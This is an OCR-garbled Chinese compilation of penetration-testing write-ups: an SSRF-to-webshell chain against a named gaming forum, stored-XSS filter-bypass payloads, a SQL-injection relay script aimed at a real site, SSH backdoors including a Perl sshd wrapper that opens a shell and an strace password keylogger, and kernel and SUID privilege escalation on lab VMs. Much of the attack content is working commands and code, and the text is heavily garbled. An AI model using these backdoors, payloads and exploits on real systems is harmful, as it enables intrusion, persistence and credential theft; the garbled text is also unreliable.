message-[img]http://myserver/wshell.php?logo.jpg[/img] 
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完成 后 ， 立 即 请 求 shell 地 址 


http://bbs.biligame.com/forum. php?mod=ajax&inajax=yes&action=get 
threadtypes 


从 上 面 可 知 ， 这 是 一 句 话 ， 由 于 要 绕 过 Waf， 所 以 base64 一 下 。 
æ Load URL |http://bbs.biligame.com/forum.php?mod=ajax&inajax=yes&action=getthreadtypes 

) Split URL 

Execute 


se 














Enable Post data Enable Referrer 

















XML 解析 错误 : 非 恨 好 格式 
位 置 : http://bbs. biligame. com/forum. php?mod=ajax&inajax=yes&action=getthreadtypes 
行 l. 列 3: 


OK'0K!0K!0K! 
E www.wooyun.org 


写 入 文件 shell 


http://bbs.biligame.com/forum. php?mod=ajax&action=downremoteimg& 
message-[img]http://myserver/cls.php?logo.jpg[/img] 


IRB 最 后 一 句 话 地 址 为 : 


http://bbs.biligame.com/data/cache/hello.php 


bilibii 某 分 站 从 信息 泄露 到 Ssrf 再 到 命令 执行 





€ @ bbsbiligame.com/dsts/cache/hello.php. Y 8 - e| E> & <an 
INT v| = SQL- XSS- Encryption- Encoding- Other- 
& Load URL | http://bbs.biligame.com/data/cache/hello.php 


split URL 
D Execute 














M] Enable Post data [] Enable Referrer 
Post data ccc=cGhwaW5mbygpO2RpZSgpOw= = 














Notice: Use of undefined constant ccc - assumed 'ccc' in /mnt/data/gamebbs/data/cache/hello. php(3) : regexp code on line 1 
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XSS 


一 次 针对 存储 型 XSS 的 fuzzing 
1、 添 加 Script 代码 


XSS 这 种 漏洞 ， 还 是 找 输入 输出 的 地 方 。 最 后 ， 我 在 留言 的 地 方 发 现 可 以 输入 ， 而 且 用 
户 自己 可 以 查看 内 容 。 一 般 来 讲 ， 用 户 自己 看 到 的 内 容 和 收 件 人 看 到 的 内 容 是 一 样 的 。 


随便 写 了 点 东西 ， 发 现 内 容 输 出 的 位 置 在 标签 之 间 ， 标 签 之 间 的 话 还 是 比较 好 办 的 。 而 
且 ， 可 以 添加 标签 ， 也 就 是 说 ，< > 的 符号 没有 被 过 滤 。 因 此 我 测试 如 下 的 payload 


<script>alert(1)</script> 


结果 发 现 ， 关 键 字 script 中 间 多 了 一 个 <x> 标 签 。 当 我 单独 输入 script 的 时 候 却 不 会 
触发 ， 然 后 大 小 写 什么 的 也 测试 了 ， 还 是 不 行 


2、 基 于 事件 属性 


既然 Script 标签 已 经 被 过 渡 了 ， 我 就 htm1 的 事件 属性 来 测试 一 下 。 刚 开始 的 时 候 ， 我 
就 用 了 一 些 简单 的 0nerror，onclick 之 类 的 。 结 果 发 现 我 会 的 属性 都 被 过 滤 ， 至 少 在 
这 个 时 候 我 还 没有 想到 fuzzing。 

基本 可 以 弄 清 楚 了 ， 遇 到 <keyword> 就 在 keyword 中 间 添 加 一 个 <X> 


3、 基 于 伪 协 议 


可 以 用 的 伪 协 议 有 javascript，DATA URI, 以 及 vbscript 
那么 我 们 就 会 定义 一 个 标签 ， 然 后 把 伪 协 议 内 容 写 在 href、Ssrc、1Link 之 类 的 属性 中 


«a hrefzdata:text/html;base64, ZGFOYTpOZXhOL2hObWw7PHN;j cm1wdD5hbG 
VydCgxKTwvc2NyaXBOPg--»click me</a> 


«a href=javascript:alert(1)>click me</a> 
«a href=data: text/html, %3cscript%3ealert(1)%3c%2fscript%3e>click 


me </a> 


属性 编码 ，HTML 的 属性 支持 实体 编码 ， 这 种 方法 很 容易 绕 过 黑 名 单 里 面 的 关键 字 ， 因 此 
有 了 下 面 语 多 


«a href=&#X6A;&#X61;&#X76;&#X61;&#X73 ;8&#X63 ;&#X72 ; &IIX69 ; &#X70; &H 
X74; &#X3A; &#X61; &4X6C ; &H#X65; &H#X72; &IUX 74; &5EX28 ; Q#X31; &Ex29; »click 
me</a> 


伪 协 议 编 码 ， 伪 协议 的 默认 编码 为 US-ASCII， 根 据 MIME 协 议 ， 支 持 的 编码 有 base64 
> quoted-pritable，7-bit，8-bit 等 等 ; 绕 过 的 方法 就 很 多 了 ， 如 下 


<a href=data: text/htm]l,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%2 
8%31%29%3c%2f%73%63%72%69%70%74%3e>click me </a> 


结果 比较 有 意思 的 是 ， 这 里 居然 还 过 滤 了 ，。 因 此 上 面 的 伪 协 议 的 方法 是 不 可 行 的 


另外 有 一 点 ， 是 关于 实体 编码 的 : 我 采用 实体 编码 之 后 ，html 源 码 显示 的 属性 值 就 应 该 
是 html 的 实体 编码 ， 如 下 图 : 


<a href=&#x6A,&Hx6l ; &#x76 ; G4x61 ; &4xX73 ; &8x63; GAX72 ; &&x69 ; &&x 70; &&x 74 ; &&x3A ; &8x61 ; &&x6C; &#x65;&#x72;&#x74;&#x28;&#x31;&#x29;>click me</a> 


AE ^ HEA AHA ROI ROL HA: 


lato 


ript:alert(1)>click me</a></td> 





<tr> 


我 千 ， 我 说 怎么 不 能 触发 ， 实 体 编码 已 经 被 解码 过 一 次 了 ， 那 么 既然 这 样 的 话 ， 试 一 试 
二 次 编码 ? ?了 ? 


结果 ， 二 次 编码 之 后 成 了 下 面 的 样子 ， 先 放 一 边 吧 ， 这 个 下 来 再 研究 了 ， 今 天 的 重点 也 
不 在 这 里 


2 Uy € > E ea HTML” css 脚本 DOM 网络 Cookies 
dy | 9S < a <td <tr < thody < table td <tr < tbody tabletablebg < div.core con < div#sendv...ain.Mail < div.main-bottom < div.cor+ 


Ej <table class= t&blebg > 
& <tbody> 
HE <tr> 
E <tr> 
S <td 
Ej <table style="width: 100%:”> 


^ 





</table> 
</td> 
</tr> 
</tbody> 
</table) 
</div> 
<div class="core_page”> </div> 


4 ` fuzzing 


上 面 的 东西 就 英名 其 妙 地 就 被 过 滤 了 ， 既 然 它 是 基于 关键 字 的 ， 关 键 字 那么 多 它 总 不 能 
全 部 过 滤 了 吧 ? 


onabort 
onafterprint 
onbeforeprint 
onbeforeunload 
onblur 

oncanplay 
oncanplaythrough 


onchange 
onclick 
oncontextmenu 
ondblclick 
ondrag 
ondragend 
ondragenter 
ondragleave 
ondragover 
ondragstart 
ondrop 
ondurationchange 
onemptied 
onended 
onerror 
onfocus 
onformchange 
onforminput 
onhaschange 
oninput 
oninvalid 
onkeydown 
onkeypress 
onkeyup 
onload 
onloadeddata 
onloadedmetadata 
onloadstart 
onmessage 
onmousedown 
onmousemove 
onmouseout 
onmouseover 
onmouseup 
onmousewheel 
onoffline 
ononline 
onpagehide 
onpageshow 
onpause 


onplay 
onplaying 
onpopstate 
onprogress 
onratechange 
onreadystatechange 
onredo 
onreset 
onresize 
onscroll 
onseeked 
onseeking 
onselect 
onstalled 
onstorage 
onsubmit 
onsuspend 
ontimeupdate 
onundo 
onunload 
onvolumechange 
onwaiting 


最 后 可 以 用 的 事件 有 下 面 这 些 ; 


oncanplay 
oncanplaythrough 
onemptied 
onended 
onformchange 
onforminput 
onhaschange 
oninput 
oninvalid 
onmessage 
onoffline 
ononline 
onpagehide 
onpageshow 
onpause 
onplay 
onplaying 
onpopstate 
onprogress 
onratechange 
onredo 
onseeked 
onseeking 
onstalled 
onstorage 
onsuspend 
ontimeupdate 
onundo 
onvolumechange 
onwaiting 


既然 要 做 到 悄 无 声息 ， 那 么 就 要 选择 一 个 好 的 事件 。 对 比 了 一 下 ，oncanplay 是 比较 好 
用 的 


一 次 针对 存储 型 XSS 的 fuzzing 


当前 位 置 : 信息 管理 > > 发 送 邮 件 
标题 : 你 好 么 
你 看 不 出 来 有 异常 吧 ? 


<video width-" 0" height="0” oncanplay=” (function() {alert (1)}) O ;^» 
<source src="http://www. runoob. com/try/demo_source/mov_bbb. mp4 
type="video/mp4”> 
<source src-"http://www. runoob. com/try/demo_source/mov_bbb. ogg” 
type-'video/ogg > 
</video> 


” 


AS: 
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Python 4 


python 脚 本 处 理 伪 静态 注入 
目前 有 很 多 网 站 做 了 rewrite. 

/?id-1 

/1 


/1111.php 


通常 情况 下 ， 动 态 脚本 的 网 站 的 ul 类似 下 面 这 样 http:;//www.xxoo.net/aa.php? 
id=123 做 了 伪 静 态 之 后 类 似 这 样 http://www.xxoo.net/aa.php/id/123.html % Ja X 3& 
势 下 ， 攻 击 的 门槛 逐渐 增高 。 这 样 有 利 有 商 ， 喜 欢 研究 的 会 深入 钻研 ， 另 一 方面 只 
会 用 工具 不 懂 原 理 的 则 充斥 到 大 小 论坛 水 区 。 实战 举例 : 

http://www. bxxxxxxxxxxxx.edu/magazine/index. php/mxxxxia/gallery/dickinsons- 
last-dance/1 这 个 点 存在 注入 


Error Number: 1064 


You have an error in your SQL syntax; check the manual that corr 
esponds to your MySQL server version for the right syntax to use 
near 'idddddd, 1' at line 4 


标准 的 显 错 注 入 。 这 里 测试 了 几 个 工具 havij 

http://www. bxxxxxxxxxxxx.edu/magazine/index.php/mxxxxia/gallery/dickinsons- 
last-dance/1 sglmap safe3 F h FP 此 上 都 无 法 直接 注入 。 这 里 借助 注入 中 转 实 
现 : 中 转 工 具有 一 些 win7 下 会 遭遇 各 种 奇 苞 问 题 。 并 linux 下 不 能 使 用 。 A python 
code 了 一 篇 ， 为 什么 用 python 因为 他 开发 快 ， 不 用 各 种 环境 。 


from BaseHTTPServer import * 

import urllib2 

class MyHTTPHandler(BaseHTTPRequestHandler ) : 

def do GET(self): 

path=self.path 

path=path[path.find('id='"})+3:] 

proxy support = urllib2.ProxyHandler({"http":"http://127.0.0.1:8 
087"}) 

opener = urllib2.build\ opener(proxy\ support) 
urllib2.install_opener (opener ) 
urlz"http://www.XXXXXXXXXXXXx . edu/magazine/imedia/gallery/dickin 
sons-last-dance/" 

try: 

response-urllib2.urlopen(url-*path) 

html-response.read() 

except urllib2.URLError,e: 

html-e.read() 

self.wfile.write(html) 

server = HTTPServer(("", 8000), MyHTTPHandler) 

server.serve forever() 


不 到 20 行 代码 (并 加 入 了 goagent 代 理 for hidden ) » 已 经 实现 了 要 求 。 
http://127.0.0.1:8000/?id=1 从 而 达到 目的 。 相 比 构 造 自 己 脚本 去 执行 sql 注 入 语 
各， 要 高 效 的 多 。 给 习惯 用 php 的 朋友 添加 一 个 php 脚 本 的 中 转注 入 : 可 以 自 定义 
需要 的 头 信 息 ， 在 需要 cookie 或 者 refer 等 位 置 都 可 以 方便 的 添加 ， 添 加 好 后 直接 访 
问 zhongzhuan.php?id=1 然 后 就 可 以 放 到 工具 中 注入 了 ， 十 分 方便 :) 


<?php 

set time limit(0); 

$id-$ GET["id"]; 

$id-str replace(" ","%20",$id); 
$id=str_replace("=","%3D", $id); 

$cookie="test"; 

$url = "http://www.qq.com/index.php/id/{$id}.htm1"; 
//$postdata = ""; 


$ch = curl_init(); 

curl_setopt($ch, CURLOPT URL, "$url"); 

curl setopt($ch, CURLOPT RETURNTRANSFER, 1); 

curl setopt($ch, CURLOPT HEADER, ©); 

curl setopt($ch, CURLOPT SSL VERIFYPEER, false); 
curl setopt($ch, CURLOPT COOKIE, "$cookie"); 

// curl setopt($ch, CURLOPT POST, 1);//postit £Z À 
// curl setopt($ch, CURLOPT POSTFIELDS, $postdata);//post 4 a4 
$output = curl exec($ch); 

curl close($ch); 

print r($output); 

?> 


linux 


ssh backdoor 


0x01. 3j È 


最 近 碰 到 很 多 留 系统 后 门 的 case， 无 论 windows 还 是 linux。 所 以 这 篇 文章 收集 了 一 
些 ssh 的 backdoor， 下 篇 文章 写 下 windows 的 backdoor 


0x02. 最 简单 的 ssh 后 门 -- soft link( 软 连接 ) 


如 果 现 在 利用 redis 反 弹 到 一 个 root 权 限 的 shell， 要 登录 ssh 的 就 可 以 利用 这 种 后 
门 。 


利用 这 一 行 命令 就 完成 了 这 个 最 简单 ssh 后 门 创 建 

[rootQhelen] 
Is 
此 时 就 可 以 用 任意 密码 进行 目标 的 Ssh 登 录 

[root@viarus -] 

root@x.x.x.x's password: 

Last login: Wed Dec 30 00:50:14 2015 from z.Z.z-z 

Welcome to aliyun Elastic Compute Service! 
如 何 发 现 并 且 删 除 后 们 ? 


在 看 网 络 连接 的 时 候 ， 看 到 这 个 奇怪 的 文件 名 监听 0.0.0.0 的 一 个 这 么 奇怪 的 端口 。 


有 经 验 的 网 FE 管 者 都 会 | /proc/pid 进 查看 


[rootehelon. - ~]# netstat -anop 
Active Internet connections (servers and established) 
Proto Recv-Q Send-Q Local Address aaia Address State PID/Program name Timer 


LISIEN 3496/redis-server off (0.00/0/0) 
LISTEN 2975/su off (0.00/0/0) 
LISTEN 844/sshd off (0.00/0/0) 
0. "H [B 9: LISTEN 24102/mysqld off (0.00/0/0) 


不 信 ， rap P remm 文件 路 径 er > 这 就 可 以 断定 是 个 后 门 程序 了 。 





[root@helen ~]# ll /proc/2975 
total 0 

dr-xr-xr-x 2 root root 

1 root root 

root root 

root root 

root root 

root root 

root root 

root root 

root root 

root root 

root root 

root root 

root root 


Dec 3 


autogroup 
auxv 
cgroup 
clear refs 
5 cmdline 
comm 
coredump filter 
cpuset 
cwd -> 
environ 
2 -> 


® © © © 


根据 进程 就 





root 2975 1 © 00:56 ? 00:00:00 /tmp/su -oPort-2 


可 以 看 到 Su 是 一 个 软 连接 ， 指 向 /usrsbin/sshd 


[root@helen ~] 

total 12 

drwxrwxrwt. 3 root root 4096 Dec 30 00:56 

dr-xr-xr-x. 22 root root 4096 Nov 10 20:26 

lrwxrwxrwx 1 root root 14 Dec 30 00:56 su -» /usr/sbin/sshd 


清除 后 门 


kill -9 pid 
rm -rf 后 门 程序 


PS : 如 果 直 接 使 用 /usr/sbin/sshd -oPort=2333， 这 样 会 输入 密码 才能 连 ssh 


0x03. SSH Server wrapper 


先 将 /usr/sbin/sshd 文 件 mv 到 /usr/bin 目 录 


[root@helen ~] 
[root@helen sbin] 
[root@helen sbin] 


再 编辑 sshd 


exec"/bin/sh"if(getpeername(STDIN)=-/A..LF/); 
exec{"/usr/bin/sshd"}"/usr/sbin/sshd", @ARGV; 


再 chmod 755 sshd 
在 本 机 上 执行 socat STDIO TCP4:target_ip:22,sourceport=19526 


这 个 效果 其 实 和 shell 效 果 一 样 ， 感 觉 并 不 是 ssh 的 后 门 


[root@viarus E socat STDIO TCP41115.29.170.21553456,sourceport=19526 
ifconfig 
ethO Link encap:Ethernet HWaddr 00:16:3E:00:51:09 
inet addr:10.162.36.208 Bcast:10.162.47.255 Mask:255.255.240.0 
UP BROADCAST RUNNING MULTICAST MTU: 15060 Metric:1 
RX packets:38148892 errors : 0 dropped:0 overruns:0 frame:0 
TX packets:154415 errors:0 dropped:0 overruns:@ carrier:0 


collisions:0 txqueuelen:1000 
RX bytes:1687939648 (1.5 GiB) TX bytes:11365295 (10.8 MiB) 
Interrupt: 165 


Link encap:Ethernet HWaddr 00:16:3E:00:00:E4 
inet add:115.29.170.215 | Bcast:115.29.171.255 Mask:255.255.252.0 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 





19526 端 口 是 这 样 来 的 


>>> import struct 

>>> buffer = struct.pack('>16',19526) 
>>> print repr(buffer) 

' NX00NXxOOLF ' 


如 何 发 现 并 删除 后 门 ? 


[root@helen sbin]# netstat -anopo 
Active Internet connections (servers and established) 
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name Timer 
0 0.0. 37 9.0.0.0:* LISTEN 3496/redis-server off (0.00/0/0) 


0 0.0. .0. E LISTEN 844/sshd off (0.00/0/0) 
0 0.0. 36 : LISTEN 24102/mysqld off (0.00/0/0) 
52 115.29.170.215:3456 183. 159.123.28:1539 ESTABLISHED 3684/sshd on (0.33/0/0) 
6 115.29.170.21823456 -28.23 ESTABLISHERC 3722/sh off (0.00/0/0) 
0 115.29.170.215:6379 42. .74.98:3893 ESTABLISHED 3496/redis-server off (0.00/0/0) 





我 们 再 看 下 ，sshd 的 进程 pid 是 844 的 文件 路 径 是 什么 /proc/844， 可 以 很 清楚 的 看 
到 sshd 的 路 径 在 /usr/bin/sshd。 因 为 正常 的 sshd 路 径 是 在 /usr/sbin/sshd， 所 以 断定 
sshd 肯 定 被 动 过 手脚 。 


[root@helen sbin] 
total 0 


dr-xr-xr-x 2 root root © Nov 10 22:24 attr 

-rw-r--r-- 1 root root 0 Nov 19 10:51 autogroup 

G = 1 root root 0 Nov 19 10:51 auxv 

-r--r--r-- 1 root root 0 Nov 19 10:51 cgroup 

--W------- 1 root root © Nov 19 10:51 clear_refs 

-r--r--r-- 1 root root © Nov 10 20:26 cmdline 

-rw-r--r-- 1 root root © Nov 19 10:51 comm 

-rw-r--r-- 1 root root 0 Nov 19 10:51 coredump filter 

-r--r--r-- 1 root root © Nov 19 10:51 cpuset 

lrwxrwxrwx 1 root root 0 Nov 19 10:51 cwd -> / 

-f-------- 1 root root © Nov 19 10:51 environ 

lrwxrwxrwx 1 root root 0 Nov 19 10:51 exe -> /usr/bin/sshd 

dr-x------ 2 root root 0 Nov 10 22:24 fd 

dr-x------ 2 root root 0 Nov 19 10:51 fdinfo 
cat 下 ， 就 知道 怎么 回 事 了 。 


[root@helen sbin] 


exec"/bin/sh"if (getpeername(STDIN)=~/4..LF/); 
exec{"/usr/bin/sshd"}"/usr/sbin/sshd", @ARGV; 


最 后 还 原 操作 : rm -rf /usr/sbin/sshd; mv /usr/bin/sshd ../sbin: 


0x04. SSH keylogger 


先 vim 当 前 用 户 下 的 .bashrc 文 件 在 最 后 面 添加 如 下 后 门 代 码 : 


ssh='strace -o /tmp/sshpwd- date '+%d%h%m%s'`.log -e re 
ad,write,connect -s2048 ssh' 


[root@helen ~]# cat /root/.bashrc 
# .bashrc 


# User specific aliases and functions 


alias rm='rm -i' 

alias cp='cp -i' 

alias mv='mv -i' 

# Source global definitions 

if [ -f /etc/bashrc ]; then 
. /etc/bashrc 





source .bashrc 命 令 使 更 改 的 配置 生效 


此 时 再 ssh 连 接 或 者 Su 切换 用 户 ， 输 入 密码 时 的 密码 ， 无 论 错误 或 者 正确 都 能 记录 
到 log 里 


write(4, "root@l 237.244's password: 
read(4, "a", 


= Ka 
"m 


HH HBH|BmHÁbwi 
E e? ut ut ut ut ut ut 
pd pd pà pd p pad p pd bb pa 





http://pastebin.com/2NgL8SDE 
http://www.jakoblell.com/blog/2014/05/07/hacking-contest-ssh-ser 
ver-wrapper/ 
https://diogomonica.com/posts/poor-man-s-ssh-keylogger/ 
http://drops.wooyun.org/tips/1951 


linux & R f] 35 web H 3k feaccess.log 


我 相信 很 多 人 都 会 遇 到 找 网 站 Web 目录 的 问题 ， 那 以 Webserver 的 类 型 来 总 结 。 


webH x 


0x01. Kangle 


kangle web 服 务 器 ( 简称 : kangle ) 是 一 款 跨 平台 、 轻 量 级 ， 功 能 强大 、 昂 操作 的 
高 性 能 web 服务 器 和 反 向 代理 服务 器 软件 。 


方法 : 
在 网 站 上 随便 点 ， 随 意 找 一 个 非 静 态 的 web 文 件 ， 比 如 goods .php 
使 用 locate /goods.php 
或 者 
在 不 支持 locate 的 系统 下 使 用 find / -type f -name "/goods.php" 2>/dev/ 
null 


这 种 locate 的 方法 也 是 通用 的 一 种 方法 


0x02. nginx 


1、ps -ef 查看 nginx 的 进程 参数 是 否 有 -C 

nginx: master process /www/server/nginx/sbin/nginx -c /www/serve 
r/nginx/conf/nginx.conf 

这 样 根据 /www/server/nginx/conf/ 的 配置 文件 去 读 取 web 目 录 和 access log 


2、 如 果 没 有 -Cc 参数 ， 那 使 用 nginx -V 命 令 ， 可 以 得 到 --conf-path=/etc/nginx/ 
nginx.conf 


再 查看 nginx.conf， 搜 索 Server 关 键 字 。 如 果 nginx.conf 没 有 server 字 符 串 ， 就 
查看 vhosts 或 者 conf.d 里 的 conf 是 否 含有 server 字 符 串 ， 在 server{} 里 就 能 找到 a 


ccess_1og 和 wwwroot 路 径 


注 : 有 这 样 的 情况 : access_1og 和 wwwroot 不 在 同一 个 conf 配 置 文件 里 


/etc/nginx/default.d/*.conf; 


location / 1 
/usr/share/nginx/html; 


index.html index.htm; 


1 
5 


error page 404 /404.htm1; 
location = /A04.html { 
/usr/share/nginx/html; 


1 
J 


rt 500 502 503 504 /50x.html; 
location = /50x.html 1 
/usr/share/nginx/html; 


l 
J 





0x03. httpd 或 者 apache 
httpd 和 apache 我 们 统一 认为 是 apache 服 务 


1、 通 过 locate httpd.conf 查 找 网 站 配置 文件 ， 再 搜索 DocumentRoot 查 找 web 目 录 


linux 查 找 网 站 web 目 录 和 access.log 


[root@viarus ~]# locate httpd.conf 
/etc/httpd/conf/httpd.conf 
[root@viarus ~]# cat /etc/httpd/conf/httpd.conf | grep Document R 


oot 
# DocumentRoot: The directory out of which you will serve your 


DocumentRoot "/var/www/html" 
# This should be changed to whatever you set DocumentRoot to. 
# DocumentRoot /www/docs/dummy-host.example.com 


web HB 3k : /var/www/html 


2 ` 3& find -type f -name xx.php x # locate xx.php 命 令 查找 网 站 特定 的 文件 ， 可 
以 快速 的 查找 Web 目录 


3、 通 过 httpd -V， 程 序 写 代码 使 用 的 方法 


O 


linux & 


4X M 35 web A 3x 47 access.log 


[root@viarus ~]# httpd -V 

Server version: Apache/2.2.15 (Unix) 
Server built: Mar 22 2016 19:03:53 
Server's Module Magic Number: 20051115:25 
Server loaded: APR 1.3.9, APR-Util 1.3.9 
Compiled using: APR 1.3.9, APR-Util 1.3.9 
Architecture: 64-bit 


Server MPM: Prefork 
threaded: no 
forked : yes (variable process count) 


Server compiled with.... 


=D 
=D 
-D 
-D 
-D 
-D 
-D 
-D 
-D 
-D 
-D 
-D 
-D 
-D 
-D 
-D 
-D 
-D 


APACHE_MPM_DIR="server/mpm/prefork" 
APR_HAS_SENDFILE 

APR_HAS_MMAP 

APR_HAVE_IPV6 (IPv4-mapped addresses enabled) 
APR_USE_SYSVSEM_SERIALIZE 
APR_USE_PTHREAD_SERIALIZE 
SINGLE_LISTEN_UNSERIALIZED_ACCEPT 
APR_HAS_OTHER_CHILD 
AP_HAVE_RELIABLE_PIPED_LOGS 
DYNAMIC_MODULE_LIMIT=128 
HTTPD_ROOT="/etc/httpd" 
SUEXEC_BIN="/usr/sbin/suexec" 
DEFAULT_PIDLOG="run/httpd.pid" 

DEFAULT SCOREBOARD-"logs/apache runtime status" 
DEFAULT LOCKFILE-"logs/accept.lock" 

DEFAULT ERRORLOG-"logs/error log" 

AP TYPES CONFIG FILE-"conf/mime.types" 

SERVER CONFIG FILE-"conf/httpd.conf" 


将 HTTPD_ROOT 和 SERVER_CONFIG_FILE 组 合 起 来 ， 
FP /etc/httpd/conf/httpd.conf 


access.log 


0x01 nginx 


1、 通 过 查看 进程 目录 下 面 的 fd 目录 Is -la /proc/pid/fd 
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[root@viarus -] 


root 7175 7045 © 10:30 pts/0 00:00:00 grep nginx 

root 8938 1 © Mar25 ? 00:00:00 nginx: master pr 
ocess nginx 

nginx 8939 8938 0 Mar25 ? 00:00:00 nginx: worker pr 
ocess 


[root@viarus -] 


total 0 

lrwx------ 1 nginx nginx 64 May 4 10:25 0 -> /dev/null 
lrwx------ 1 nginx nginx 64 May 4 10:25 1 -» /dev/null 
l-wx------ 1 nginx nginx 64 May 4 10:25 2 -> /var/iog/nginx/err 
or.log 

l-wx------ 1 nginx nginx 64 May 4 10:25 3 -> /var/iog/nginx/acc 
ess.log 


结果 : Ivar/log/nginx/access.log 


2、 使 用 nginx -V 

[root@viarus ~]# nginx -V 

nginx version: nginx/1.0.15 

built by gcc 4.4.7 20120313 (Red Hat 4.4.7-11) (Q 
TLS SNI support enabled 


configure arguments: --prefix=/usr/share/nginx - 
r.log --http-log-path£/var/log/nginx/access.log 
/tmp/proxy --http-fastcgi-temp-path=/var/1lib/ngi 





0x02 apache 


1、 通 过 查看 进程 目录 下 面 的 fd 目录 Is -la /proc/pid/fd 


[root@viarus ~]# ps 


root 

apache 
apache 
apache 
apache 
apache 
apache 
apache 
apache 
root 


[root@viarus ~]# ll /proc/ 


total 0 


7094 


(D 


1 


7096 7094 
7097 7094 
7098 7094 
7099 7094 
7100 7094 
7101 7094 
7102 7094 
7103 7094 
7179 7045 


1 root 
1 root 
1 root 


1 root 
1 root 
1 root 
1 root 


root 
root 
root 


root 
root 
root 
root 


© © © © © © © © © © 


结果 : Ivar/log/httpd/access_log 


+ A Aa >A 


OORA OUO 


-> 


:00 /usr/sbin/httpd 
:00 /usr/sbin/httpd 
:00 /usr/sbin/httpd 
:00 /usr/sbin/httpd 
:00 /usr/sbin/httpd 
:00 /usr/sbin/httpd 
:00 /usr/sbin/httpd 
:00 /usr/sbin/httpd 
:00 /usr/sbin/httpd 
:00 grep httpd 


/dev/null 
/dev/null 
/var/log/httpd/error_ 


socket: [1313779 ] 
pipe: [1313798] 

pipe: [1313798] 
/var/log/httpd/acces 


介绍 : 


在 渗透 测试 或 者 漏洞 评估 的 过 程 中 ， 提 权 是 非常 重要 的 一 步 ， 在 这 一 步 ， 黑客 和 安 
全 研究 人 员 常 常 通过 exploit,bug, 错 误 配 置 来 提升 权限 。 本 文 的 例子 都 是 在 虚拟 机 里 
测试 的 ， 不 同 的 虚拟 机 可 以 从 Vulnhub 下 载 。 


实验 一 : 利用 Linux 内 核 漏洞 提 权 


VulnOS version 2 是 VulHub 上 的 一 个 Linux 提 权 练 习 ， 当 打开 虚拟 机 后 ， 可 以 看 到 


webmingVulnOSv2:-$ whoami 
webmin 

webmingVulnOSv2:-$ pwd 
/home /webmin 
webmingVulnOSv2:-$S ls 


webmin@VuLn0Sv2:~$ || 
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获取 到 低 权 限 SHELL 后 我 们 通常 做 下 面 几 件 事 


工 .检测 操作 系统 的 发 行 版 本 


2 ,查看 内 核 版 本 


,检测 当前 用 户 权 限 


CD 


4. 列 举 Suid 文 件 


5., 查 看 已 经 安装 的 包 ， 程 序 ， 和 运行 的 服务 ， 过 期 版 本 的 有 可 能 有 漏洞 


$ lsb release -a 


查看 系统 的 发 行 版 本 


webmin@VuLnO0Sv2:~$ lsb release -a 
No LSB modules are available. 
: Ubuntu 
Ubuntu 14.04.4 LTS 
14.04 


trusty 


webmingVulnoSv2:-S B 
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$ uname -a 


查看 内 核 版 本 


webmingVulnOSv2:-$ lsb release -a 
No LSB modules are available. 
Distributor ID: Ubuntu 
Description: Ubuntu 14.04.4 LTS 
14.04 
trusty 
Sv2:-$ 


webming@Vuln0Sv2:~$ 


OSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 1686 1686 1686 GNU/Linux 
webmin@Vuln0Sv2:~$ 1 
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每 次 
在 提 权 的 时 候 ， 我 们 都 会 一 次 又 一 次 的 测试 ， 我 们 将 搜索 所 有 可 能 的 提 权 技术 ， 并 
依次 应 用 ， 直 到 成 功 。 我 们 将 测试 不 同 的 内 核 exploit, 也 会 暴力 破解 账号 。 这 个 例子 
我 们 知道 操作 系统 采用 的 是 Ubuntu 14.04.4 LTS， 内 核 版 本 是 3.13.0-24-generic， 
首先 我 们 尝试 利用 overlayfs, 这 个 exploit 会 工作 在 Ubuntu 12.04/14.04/14.10/15.04 
的 linux 内 核 3.19 之 前 和 3.13.0 之 后 ， 我 们 测试 一 下 。 


我 们 首先 移动 到 /tmp 目 录 ， 然 后 新 建 一 个 文件 ， 粘 贴 exploit 代 码 进 去 


依次 运 和 


$ cd /tmp 
$ touch exploit.c 
$ vim exploit.c 


vim 保 存 推出 后 ， 我 们 编译 代码 


$ gcc exploit.c -0 exploit 


现在 执行 ， 如 果 提 示 没 有 权限 ， 还 需 chomd 777 ./exploit 


$ ./exploit 


webmin@Vuln0Sv2:~$ cd /tmp 
2:/tmp$ touch exploit.c 
z /tmpS vim exploit.c 
:/tmp$ gcc exploit.c -o exploit 
:/tmpS ls -tr 


Sv2:/tmpS ./exploit 


Jetc/ld.so.preload created 

creating shared library 

# python -c ‘import pty; pty.spawn("/bin/bash")' 
root@VulnOSv2:/tmp# ü 


安全 客 ( bobao.360.cn ) 





截图 可 以 看 到 我 们 已 经 获取 到 了 root 权 限 ， 接 下 来 获取 交互 式 的 shell 


$ python -c ‘import pty; pty.spawn("/bin/bash")"' 


如 果 提 权 失 败 了 ， 我 个 人 建议 你 测试 几 个 其 他 的 exploit, 新 的 内 核 版 本 也 可 以 试 试 
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) — overlayfs Local 
Root Shell 


https://www.exploit-db.com/exploits/37292/ 

Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) — ‘overlayfs’ Local Root Exploit 
https://www.exploit-db.com/exploits/39166/ 

Linux Kernel 4.3.3 — ‘overlayfs’ Local Privilege Escalation 
https://www.exploit-db.com/exploits/39230/ 


最 后 核心 提示 : 内 核 exploit 提 权 有 风险 ， 有 可 能 会 前 溃 系 统 。 


实验 2 : 利用 低 权 限 用 户 目 录 下 可 被 Root 权限 用 户 调用 
的 脚本 提 权 


Mr.Robot 是 另 一 个 boot 到 root 的 挑战 虚拟 机 ， 我 拿 这 个 例子 来 告诉 你 为 什么 suid 程 
序 在 提 权 的 过 程 中 是 重要 的 ， 如 果 你 以 前 对 suid 没 有 了 解 ， 可 以 参 
考 我 们 首先 查看 下 当前 用 户 


daemon@linux:/$ whoami; pwd; 
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通过 


截图 可 以 得 知 ， 当 前 用 户 为 "daemon"， 我 们 接 下 来 提 权 "daemon" 到 "root" 


这 台 Ubuntu 14.04 运 行 linux 内 核 3.13.0-55-generic， 我 尝试 已 有 的 exploit 都 失败 


daemon@linux:/tmp$ gcc exploit kernel.c 

gcc exploit kernel.c 

daemon@linux:/tmp$ ./a.out 

./a.out 

mount failed.. 

couldn't create suid :( 
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了 o 
过 寻找 系统 里 可 以 用 的 SUID 文 件 来 提 权 。 运 行 : 


(A 


这 次 我 们 i 


$ find / -perm -u=s -type f 2>/dev/null 


4a ê 

得 到 如 下 列表 : 

daemon@linux:/tmp$ find / -perm -u=s -type f 2>/dev/null 
find / -perm -uss -type f 2»/dev/null 


